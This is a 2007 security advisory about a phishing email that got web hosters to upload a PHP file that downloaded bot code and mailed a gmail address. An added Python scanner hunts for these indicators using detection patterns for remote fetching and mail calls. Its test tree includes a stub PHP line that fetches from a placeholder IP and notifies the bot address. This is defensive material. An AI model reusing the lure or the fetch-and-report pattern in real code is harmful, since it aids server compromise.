NOW READ THIS
("Security Advisory")
Submitted by: Bill Hickey
NCVA List Master
NRT-0211 Deceptive Email to Web Hosters in USA:
A deceptive email recently sent to web hosters in the US contained an attached PHP file which, when uploaded, turned the affected computer into a bot, according to an FBI report. A convincing email, claiming to come from the parent web hoster, was mass-mailed to customers of various US web-hosting companies. The message directed the customers to upload an attached PHP file - safeguard.PHP - to their web directory in order to avoid a serious security issue. Once uploaded, the PHP file downloaded bot-code to the infected computer. At least one individual uploaded the file to their content directory, which made the script in the poisoned PHP file executable. The malicious PHP file then downloaded a very small file of bot-code from a known US IP address. The file also sent an email to "firstbts(@)gmail.com" to announce the creation of a new bot. The server hosting the infected PHP file is believed to have been compromised, rather than knowingly hosting the malicious content.
(FBI source - 16JUN07)
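For hosting administrators who want to check customer web directories against this advisory, the following is an added example, not part of the FBI report or the original posting. It sweeps a web root for the reported file name and notification address; the fetch-plus-mail heuristic, the function names and the sample tree (which uses the documentation address 192.0.2.10) are assumptions constructed for illustration.

```python
import os
import re
import tempfile
# Indicators taken from the advisory text (file name is compared case-insensitively).
IOC_FILENAME = "safeguard.php"
IOC_ADDRESS = re.compile(rb"firstbts\s*\(?@\)?\s*gmail\.com", re.I)
# Assumed heuristic, not from the advisory: remote fetch plus outbound mail in one file.
REMOTE_FETCH = re.compile(rb"curl_exec|fsockopen|(?:file_get_contents|fopen|copy)\s*\(\s*['\"](?:https?|ftp)://", re.I)
SENDS_MAIL = re.compile(rb"\bmail\s*\(", re.I)

def scan_webroot(root):
    """Return {relative_path: [reasons]} for PHP files matching the indicators."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1_000_000)  # cap the bytes read per file
            except OSError:
                continue  # unreadable file: skip it, do not abort the sweep
            reasons = []
            if name.lower() == IOC_FILENAME:
                reasons.append("filename")
            if IOC_ADDRESS.search(data):
                reasons.append("address")
            if REMOTE_FETCH.search(data) and SENDS_MAIL.search(data):
                reasons.append("fetch+mail")
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def build_constructed_webroot():
    """Constructed sample tree of inert stubs, used only to exercise the scanner."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "site1/SafeGuard.PHP": b"<?php $b = file_get_contents('http://192.0.2.10/x'); mail('firstbts@gmail.com', 'new', 'up'); ?>",
        "site2/renamed.php": b"<?php $to = 'firstbts(@)gmail.com'; ?>",
        "site2/contact.php": b"<?php mail($to, 'Contact form', $body); ?>",
        "site3/index.html": b"<html>firstbts@gmail.com</html>",
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    return root
```

A "filename" or "address" hit is a direct match on the advisory's indicators; a "fetch+mail" hit alone is only a lead and needs manual review, since legitimate scripts can do both.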
Last Modified: Monday, 25-Jun-2007 09:24:57 EDT